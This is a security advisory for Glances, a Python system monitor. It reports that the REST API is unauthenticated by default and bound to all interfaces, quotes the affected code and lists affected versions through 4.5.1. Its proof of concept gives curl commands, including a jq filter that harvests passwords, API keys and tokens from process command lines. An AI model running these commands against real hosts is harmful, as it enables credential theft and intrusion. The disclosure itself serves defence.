GHSA-wvxv-4j8q-4wjq

Suggest an improvement
Source
https://github.com/advisories/GHSA-wvxv-4j8q-4wjq
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/03/GHSA-wvxv-4j8q-4wjq/GHSA-wvxv-4j8q-4wjq.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-wvxv-4j8q-4wjq
Aliases
Published
2026-03-16T16:23:56Z
Modified
2026-03-19T21:16:25.221428Z
Severity
  • 8.7 (High) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N CVSS Calculator
Summary
Glances exposes the REST API without authentication
Details

Summary

Glances web server runs without authentication by default when started with glances -w, exposing REST API with sensitive system information including process command-lines containing credentials (passwords, API keys, tokens) to any network client.

Details

Root Cause: Authentication is optional and disabled by default. When no password is provided, the API router initializes without authentication dependency, and the server binds to 0.0.0.0 exposing all endpoints.

Affected Code: - File: glances/outputs/glances_restful_api.py, lines 259-272

if self.args.password:
    self._password = GlancesPassword(username=args.username, config=config)
    if JWT_AVAILABLE:
        jwt_secret = config.get_value('outputs', 'jwt_secret_key', default=None)
        jwt_expire = config.get_int_value('outputs', 'jwt_expire_minutes', default=60)
        self._jwt_handler = JWTHandler(secret_key=jwt_secret, expire_minutes=jwt_expire)
        logger.info(f"JWT authentication enabled (token expiration: {jwt_expire} minutes)")
    else:
        self._jwt_handler = None
        logger.info("JWT authentication not available (python-jose not installed)")
else:
    self._password = None  # NO AUTHENTICATION BY DEFAULT
    self._jwt_handler = None
  • File: glances/outputs/glances_restful_api.py, lines 477-480
if self.args.password:
    router = APIRouter(prefix=self.url_prefix, dependencies=[Depends(self.authentication)])
else:
    router = APIRouter(prefix=self.url_prefix)  # NO AUTH DEPENDENCY
  • File: glances/outputs/glances_restful_api.py, lines 98-99
self.bind_address = args.bind_address or "0.0.0.0"  # BINDS TO ALL INTERFACES
self.port = args.port or 61208
  • File: glances/plugins/processlist/__init__.py, lines 127-140
enable_stats = [
    'cpu_percent',
    'memory_percent',
    'memory_info',
    'pid',
    'username',
    'cpu_times',
    'num_threads',
    'nice',
    'status',
    'io_counters',
    'cpu_num',
    'cmdline',  # FULL COMMAND LINE EXPOSED, NO SANITIZATION
]

PoC

  1. Start Glances in default web server mode:

    glances -w
# Output: Glances Web User Interface started on http://0.0.0.0:61208/

  2. Access API without authentication from any network client:

    curl -s http://TARGET:61208/api/4/system | jq .

<img width="593" height="265" alt="image" src="https://github.com/user-attachments/assets/4ec461be-b480-46d5-88e2-f4004f4dae54" />

  1. Extract system information:

    curl -s http://TARGET:61208/api/4/all > system_dump.json

    <img width="688" height="547" alt="image" src="https://github.com/user-attachments/assets/7564fb2a-7d94-4c26-848a-03034214b8c7" />

  2. Harvest credentials from process list:

    curl -s http://TARGET:61208/api/4/processlist | \
  jq -r '.[] | select(.cmdline | tostring | test("password|api-key|token|secret"; "i")) | 
  {pid, username, process: .name, cmdline}'

  3. Example credential exposure:

    {
  "pid": 4059,
  "username": "root",
  "process": "python3",
  "cmdline": [
    "python3",
    "-c",
    "import time; time.sleep(3600)",
    "--api-key=sk-super-secret-token-12345",
    "--password=MySecretPassword123",
    "--db-pass=admin123"
  ]
}

Impact

Complete system reconnaissance and credential harvesting from any network client. Exposed endpoints include system info, process lists with full command-line arguments (containing passwords/API keys/tokens), network connections, filesystems, and Docker containers. Enables lateral movement and targeted attacks using stolen credentials.

Database specific 
{
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-16T16:23:56Z",
    "severity": "HIGH",
    "nvd_published_at": "2026-03-18T06:16:18Z",
    "cwe_ids": [
        "CWE-200"
    ]
}
References

Affected packages

PyPI / glances

Package

Name
glances
View open source insights on deps.dev
Purl
pkg:pypi/glances

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
4.5.2

Affected versions

1.*
1.3.1
1.3.2
1.3.3
1.3.4
1.3.5
1.3.6
1.3.7
1.4
1.4.1
1.4.1.1
1.4.2
1.4.2.1
1.5
1.5.1
1.5.2
1.6
1.6.1
1.7
1.7.1
1.7.2
1.7.3
1.7.4
1.7.5
1.7.6
1.7.7
2.*
2.0
2.0.1
2.1
2.1.1
2.1.2
2.2
2.2.1
2.3
2.4
2.4.1
2.4.2
2.5
2.5.1
2.6
2.6.1
2.6.2
2.7
2.7.1
2.8
2.8.1
2.8.2
2.8.3
2.8.4
2.8.5
2.8.6
2.8.7
2.8.8
2.9.0
2.9.1
2.10
2.11
2.11.1
3.*
3.0
3.0.1
3.0.2
3.1.0
3.1.1
3.1.2
3.1.3
3.1.4
3.1.4.1
3.1.5
3.1.6
3.1.6.1
3.1.6.2
3.1.7
3.2.0
3.2.1
3.2.2
3.2.3
3.2.3.1
3.2.4
3.2.4.1
3.2.4.2
3.2.5
3.2.6.1
3.2.6.2
3.2.6.3
3.2.6.4
3.2.7
3.3.0
3.3.0.1
3.3.0.2
3.3.0.3
3.3.0.4
3.3.1
3.3.1.1
3.4.0
3.4.0.1
3.4.0.2
3.4.0.3
3.4.0.4
3.4.0.5
4.*
4.0.1
4.0.2
4.0.3
4.0.4
4.0.5
4.0.6
4.0.7
4.0.8
4.1.0
4.1.1
4.1.2
4.2.0
4.2.1
4.3.0
4.3.0.1
4.3.0.3
4.3.0.4
4.3.0.5
4.3.0.6
4.3.0.7
4.3.0.8
4.3.1
4.3.2
4.3.3
4.4.0
4.4.1
4.5.0
4.5.0.1
4.5.0.2
4.5.0.3
4.5.0.4
4.5.0.5
4.5.1

Database specific

source 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/03/GHSA-wvxv-4j8q-4wjq/GHSA-wvxv-4j8q-4wjq.json"